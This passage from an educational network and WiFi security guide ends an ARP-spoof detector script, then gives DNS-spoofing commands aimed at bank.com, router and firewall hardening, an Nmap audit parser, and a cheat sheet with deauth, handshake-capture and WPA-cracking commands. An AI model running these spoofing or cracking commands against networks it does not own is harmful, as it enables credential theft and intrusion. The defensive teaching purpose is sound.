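        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_changed(table, gateway_ip=GATEWAY_IP, known_mac=GATEWAY_MAC):
    """True if the gateway now resolves to a MAC other than the baseline.
    A missing gateway entry is treated as unchanged (nothing to compare)."""
    return table.get(gateway_ip, known_mac).lower() != known_mac.lower()


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP)
    print("duplicate MACs:", duplicate_macs(table))
    print("gateway MAC changed:", gateway_changed(table))
```

A single MAC answering for both the gateway and another host, with the gateway MAC no longer matching the baseline, is exactly the picture the diagram above produces from the victim's side. Pipe in live output (arp -n) from cron and alert on either condition.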

DNS Spoofing

# dnsspoof (after the MITM is in place)
# Put fake entries in a hosts-style file
$ echo "192.168.1.100 bank.com" >> /tmp/fakehosts
$ dnsspoof -f /tmp/fakehosts

# Bettercap DNS spoofing
» set dns.spoof.domains bank.com,facebook.com
» set dns.spoof.address 192.168.1.100
» dns.spoof on
CHAPTER 11
🛡️ Network & WiFi Defense
Complete guide to securing your own network: do it now

WiFi Router Security Checklist

Fix These Now

  • Change the default router password (admin/admin)
  • If you are on WEP or WPA, upgrade to WPA2/WPA3
  • Disable WPS completely
  • Disable remote management
  • Update the firmware

Good Practices

  • Use WPA3 (where possible)
  • Use a random WiFi password of 20+ characters
  • Keep the guest network separate
  • Change the SSID (not the ISP default)
  • Check connected devices regularly
  • Use a VPN on public WiFi

Network-Level Defense

# Firewall (UFW) setup on a Linux server
$ ufw enable
$ ufw default deny incoming
$ ufw default allow outgoing
$ ufw allow 22/tcp        # SSH only
$ ufw allow 80/tcp        # HTTP
$ ufw allow 443/tcp       # HTTPS
$ ufw deny 23/tcp         # Block Telnet
$ ufw status verbose

# ARP spoofing protection
$ arp -s GATEWAY_IP GATEWAY_MAC    # Static ARP entry
# Enable Dynamic ARP Inspection (DAI) on the router/switch

# Scan your own network with Nmap
$ nmap -sV -A 192.168.1.0/24 -oA home_network_audit
# Close any ports that are unexpectedly open
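The audit command above writes three files with -oA; the grepable one (home_network_audit.gnmap) is the easiest to check by script. The example below is added here and is not from the original guide (it also illustrates the -oG output format from the Chapter 03 output section): it parses -oG lines and lists open ports that are not on a per-host allowlist, which is exactly the "unexpectedly open" set the last comment tells you to close. The two Host: lines are constructed sample output in the -oG layout, and ALLOWLIST is a constructed policy.

```python
# Added example (not from the original guide): parse Nmap -oG output and list
# open ports outside a per-host allowlist. The scan lines are constructed
# sample data in the -oG layout; ALLOWLIST is a constructed policy.
import re

SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sV -A 192.168.1.0/24 -oA home_network_audit
Host: 192.168.1.1 (router.lan)\tPorts: 22/open/tcp//ssh//OpenSSH 8.2/, 23/open/tcp//telnet///, 80/open/tcp//http//Apache httpd 2.4.41/\tIgnored State: closed (997)
Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (997)
Host: 192.168.1.20 ()\tStatus: Up
# Nmap done: 256 IP addresses (3 hosts up) scanned
"""

HOST_RE = re.compile(r"^Host: (\d+\.\d+\.\d+\.\d+)")


def parse_gnmap(text):
    """IP -> list of (port, proto, state, service, version) from -oG output."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                      # comment lines
        ip = m.group(1)
        hosts.setdefault(ip, [])          # hosts with only "Status: Up" get an empty list
        for field in line.split("\t"):    # -oG fields are tab-separated
            if not field.startswith("Ports: "):
                continue
            for entry in field[len("Ports: "):].split(", "):
                # Each entry is port/state/proto/owner/service/rpc/version/
                parts = entry.split("/")
                hosts[ip].append((int(parts[0]), parts[2], parts[1], parts[4], parts[6]))
    return hosts


def unexpected_open_ports(hosts, allowlist, default=frozenset()):
    """IP -> sorted open ports not allowed for that host; clean hosts are omitted."""
    result = {}
    for ip, ports in hosts.items():
        allowed = allowlist.get(ip, default)   # unknown hosts: nothing is allowed
        extra = sorted(port for port, _proto, state, _svc, _ver in ports
                       if state == "open" and port not in allowed)
        if extra:
            result[ip] = extra
    return result


# Constructed policy: the router may expose SSH and HTTP, the server only SSH.
ALLOWLIST = {"192.168.1.1": {22, 80}, "192.168.1.10": {22}}

if __name__ == "__main__":
    hosts = parse_gnmap(SAMPLE_GNMAP)
    for ip, ports in unexpected_open_ports(hosts, ALLOWLIST).items():
        print(ip, "unexpected open ports:", ports)
```

Nmap escapes any "/" inside a version string as "|" in -oG output, so the split on "/" above is safe. In the sample, Telnet on the router and SMB/RDP on the server are the findings; they are the ports to close or firewall before the next audit.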

WiFi Password Strength Test

# Test how strong your own WiFi password really is
# Step 1: capture your own network's handshake (Chapter 08)
# Step 2: try to crack it with rockyou.txt
$ aircrack-ng -w /usr/share/wordlists/rockyou.txt -b YOUR_BSSID handshake.cap
# If it cracks → change the password!

# Strong password examples:
# Tr0ub4dor&3          (xkcd-style passphrase) ← still only medium
# K#9mP@2Lq!vN7rTw     (random 16 characters)   ← this is the good one
# Use a password manager to generate it!
CHAPTER 12
📋 Cheat Sheet — Complete Reference
Nmap, tcpdump, aircrack-ng, Wireshark filters: all commands in one place

🗺️ Nmap Cheat Sheet

Scan Types
  nmap -sS IP                    SYN stealth (default)
  nmap -sT IP                    TCP connect
  nmap -sU IP                    UDP scan
  nmap -sV IP                    Version detection
  nmap -A IP                     Aggressive (all)
  nmap -sn 192.168.1.0/24        Ping scan only

Ports & Output
  nmap -p- IP                    All 65535 ports
  nmap -p 80,443 IP              Specific ports
  nmap --top-ports 100 IP        Top 100
  nmap -oA output IP             Save all formats
  nmap -T4 IP                    Fast timing
  nmap --script vuln IP          Vuln scan

📦 tcpdump Cheat Sheet

Capture
  tcpdump -i eth0                Capture on interface
  tcpdump -i eth0 -w file.pcap   Save to file
  tcpdump -r file.pcap           Read file
  tcpdump -i eth0 -n             No DNS lookup
  tcpdump -i eth0 -A port 80     HTTP content

Filters
  tcpdump host IP                Specific IP
  tcpdump port 443               Specific port
  tcpdump tcp                    TCP only
  tcpdump udp                    UDP only
  tcpdump icmp                   ICMP/ping only

📡 Aircrack-ng Suite Cheat Sheet

Monitor & Scan
  airmon-ng check kill           Kill interfering processes
  airmon-ng start wlan0          Monitor mode
  airmon-ng stop wlan0mon        Stop monitor mode
  airodump-ng wlan0mon           Network scan
  wash -i wlan0mon               WPS scan

Capture & Crack
  airodump-ng --bssid MAC -c CH -w cap wlan0mon     Handshake capture
  aireplay-ng --deauth 10 -a BSSID wlan0mon         Deauth attack
  aircrack-ng cap.cap -w wordlist.txt               Dictionary crack
  hashcat -m 22000 hash.hc22000 wordlist.txt        GPU crack
  hcxpcapngtool cap.cap -o hash.hc22000             Convert format

🦈 Wireshark Filter Cheat Sheet

Protocol Filters
  http                               HTTP traffic
  dns                                DNS queries
  tcp.port == 22                     SSH
  tcp.flags.syn == 1                 SYN packets
  arp                                ARP packets
  icmp                               Ping/ICMP

Content Filters
  http.request.method == "POST"      POST requests
  http contains "password"           Find "password"
  ip.addr == 192.168.1.1             IP filter
  dns.qry.name contains "google"     DNS query
  wlan.fc.type_subtype == 0x08       WiFi beacon
  eapol                              WPA handshake
$ nmap -sV --script vuln 192.168.1.0/24
[+] Network scanning: learned
[+] WiFi security: understood
[+] Protect your own network

Entirely educational. Practice only in authorized environments and on your own network.

v1.0 — Network Scanning & WiFi Security | Bilingual | 12 Chapters + Cheat Sheet